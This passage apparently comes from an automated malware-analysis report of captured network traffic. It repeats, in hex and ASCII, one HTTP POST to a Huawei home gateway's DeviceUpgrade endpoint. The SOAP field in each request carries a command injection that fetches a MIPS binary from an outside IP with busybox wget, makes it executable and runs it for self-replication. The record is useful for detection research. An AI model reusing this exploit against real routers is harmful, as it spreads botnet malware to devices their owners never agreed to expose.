3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 